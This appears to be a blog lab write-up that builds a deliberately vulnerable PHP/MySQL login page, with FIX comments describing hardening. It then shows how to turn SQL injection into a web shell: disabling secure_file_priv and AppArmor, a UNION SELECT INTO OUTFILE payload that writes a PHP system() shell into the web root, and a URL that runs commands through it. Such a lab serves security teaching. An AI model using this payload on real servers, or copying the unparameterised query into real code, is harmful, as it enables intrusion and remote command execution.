Saturday, July 8, 2017

shell from sql injection

1- Create the login database:
***user.sql***
-- user.sql: schema and seed rows for the login lab.
-- There is no password hashing; index.php compares the submitted password
-- directly against the `password` column in this table.
CREATE DATABASE login;
USE login;

CREATE TABLE `login` (
    `id`       INT          NOT NULL AUTO_INCREMENT,
    `user`     VARCHAR(100) NOT NULL,
    `password` VARCHAR(100) NOT NULL,
    PRIMARY KEY (`id`)
);

-- Two test accounts; ids 1 and 2 are assigned by AUTO_INCREMENT.
INSERT INTO login (user, password) VALUES
    ('user1', 'pass1'),
    ('user2', 'pass2');



$ mysql -u root -p < user.sql

2- Set up your web test directory in /var/www/html/test:
***index.php ***
<?php
// index.php — deliberately vulnerable login form used by this lab.
// The page reads the submitted username/password, interpolates them into a
// SQL string and runs it; step 5 of the write-up abuses exactly that.
// Comments marked FIX describe the hardening a real login form would need.

session_start();

// Hard-coded credentials for the MySQL *root* account. The INTO OUTFILE
// write in step 5 depends on the connecting account holding MySQL's FILE
// privilege; FIX: connect with a dedicated account limited to SELECT on
// login.login, which would make that write fail.
define('DB_SERVER', 'localhost');
define('DB_USERNAME', 'root');
define('DB_PASSWORD', 'me');
define('DB_DATABASE', 'login');
$db = mysqli_connect(DB_SERVER,DB_USERNAME,DB_PASSWORD,DB_DATABASE);
// The connection result is never checked; on failure $db is false.

// Read without isset(): a request with no 'action' raises an undefined-index
// notice. $_REQUEST may also be populated from the query string or cookies,
// not only from the form POST.
$action=$_REQUEST['action'];
$show = true;
if ($action=="")    /* no action given: handle a login POST, then render the form */
    {
        if ($_POST){
            // Raw, unvalidated user input.
            $user = $_POST['user'];
            $pass = $_POST['pass'];
        // $user = mysqli_real_escape_string($db,$_POST['user']);
        // (Escaping is left disabled on purpose. Escaping only protects values
        // inside quoted literals; a bound parameter is the robust fix — see
        // the FIX block below.)


         // SQL INJECTION: both values are interpolated into the query unescaped,
         // so a quote in either field changes the statement. Passwords are also
         // compared in plain text against the `password` column (user.sql).
         // FIX:
         //   $stmt = mysqli_prepare($db, 'SELECT id FROM login WHERE user = ? AND password = ?');
         //   mysqli_stmt_bind_param($stmt, 'ss', $user, $pass);
         //   mysqli_stmt_execute($stmt);
         // and store/verify a password hash rather than the clear text.
         $sql = "SELECT id FROM login WHERE user = '$user' and password = '$pass'";
          //file_put_contents('php://stderr', print_r($sql, TRUE));
             // The statement runs here, whatever it has become. Any side effect
             // of an injected query (e.g. the step-5 INTO OUTFILE) happens at
             // this point, before the login decision below is made.
             $result = mysqli_query($db,$sql);
              // $result is not checked: on a query error mysqli_query() returns
              // false and the next two calls operate on that. $row is never used.
              $row = mysqli_fetch_array($result,MYSQLI_ASSOC);
        $count = mysqli_num_rows($result);


            // Exactly one matching row counts as a login; zero or several do not.
            if ($count == 1){

            // Stores the raw submitted string, not the id returned by the query.
            $_SESSION['login_user'] = $user;
                $msg = "<br>login successful <br>";
                $show = false;
            }else{
                // Same message for "no such user" and "wrong password".
                $msg = "wrong password <br>";
            }
         }
    }
   
?>

<html>
<head>
<title>Login form</title>
</head>
<body>
    <?php
        // $msg is only assigned inside the POST branch above, so on the first
        // (GET) render the echo below prints an undefined variable. Both
        // messages are constant strings, so no user input is reflected here.
        // The document also never emits a closing </html> tag.
        if ($show == false){
            echo '<a href="."> logout! </a>';
            echo $msg;
        }else{
          
        
            // Posts back to this same script; the form field names match the
            // $_POST keys read above.
            echo '<form method="post" action="index.php">';
            echo 'Username:<input type="text" size="100" maxlength="120" name="user"><br />';
            echo 'Password:<input type="password" size="100" maxlength="360" name="pass"><br />';
            echo $msg;
            echo '<input type="submit" name="login" value="Login">';
            echo '</form>';
 
        }
    ?>
</body>



3- Disable secure_file_priv in MySQL by adding the lines below to /etc/mysql/my.cnf. This variable restricts the directory that INTO OUTFILE may write to; an empty value removes the restriction, which is what the write in step 5 depends on.
[mysqld]
secure_file_priv=""

If your MySQL server shows the value below, INTO OUTFILE can only write into that directory, so the output file cannot be placed under the web root and you will not be able to execute it later:
mysql> SHOW VARIABLES LIKE "secure_file_priv";
+------------------+-----------------------+
| Variable_name    | Value                 |
+------------------+-----------------------+
| secure_file_priv | /var/lib/mysql-files/ |
+------------------+-----------------------+
1 row in set (0.00 sec)








4- Disable AppArmor (its MySQL profile may otherwise block the file write in step 5):
$ sudo /etc/init.d/apparmor stop
$ sudo /etc/init.d/apparmor teardown

5- Create the shell through SQL injection in the username input box:
user10' union select "<?php system($_REQUEST['cmd']); ?>" INTO OUTFILE '/var/www/html/test/out.php';#


6- Now, to list the root directory, use the following URL:
http://serverip/test/out.php?cmd=ls /
